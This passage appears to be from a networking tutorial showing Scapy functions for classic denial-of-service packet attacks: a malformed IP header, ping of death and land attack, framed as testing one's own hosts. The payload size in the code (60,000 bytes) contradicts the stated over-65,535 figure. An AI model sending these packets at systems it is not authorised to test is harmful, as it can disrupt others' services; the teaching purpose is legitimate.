In this example, let's look at how we can construct our packet to conduct some of the classic attacks, such as Ping of Death (https://en.wikipedia.org/wiki/Ping_of_death) and Land Attack (https://en.wikipedia.org/wiki/Denial-of-service_attack). This is perhaps the network penetration tests that you previously had to pay for with a similar commercial software. With Scapy, you can conduct the test while maintaining full control as well as adding more tests in the future.

The first attack basically sends the destination host with a bogus IP header, such as the length of 2 and the IP version 3:

def malformed_packet_attack(host):
    send(IP(dst=host, ihl=2, version=3)/ICMP()) 

The ping_of_death_attack consists of the regular ICMP packet with a payload bigger than 65,535 bytes:

def ping_of_death_attack(host):
    # https://en.wikipedia.org/wiki/Ping_of_death
    send(fragment(IP(dst=host)/ICMP()/("X"*60000)))

The land_attack wants to redirect the client response back to the client itself and exhausts the host's resources:

  def land_attack(host):
      # https://en.wikipedia.org/wiki/Denial-of-service_attack
      send(IP(src=host, dst=host)/TCP(sport=135,dport=135))

These are pretty old vulnerabilities or classic attacks that the modern operating system is no longer susceptible to. For our Ubuntu 14.04 host, none of the preceding attacks will bring it down. However, as more security issues are being discovered, Scapy is a great tool to start tests against our own network and host without having to wait for the impacted vendor to give you a validation tool. This is especially true for the zero-day (published without prior notification) attacks that seem to be more and more common on the internet.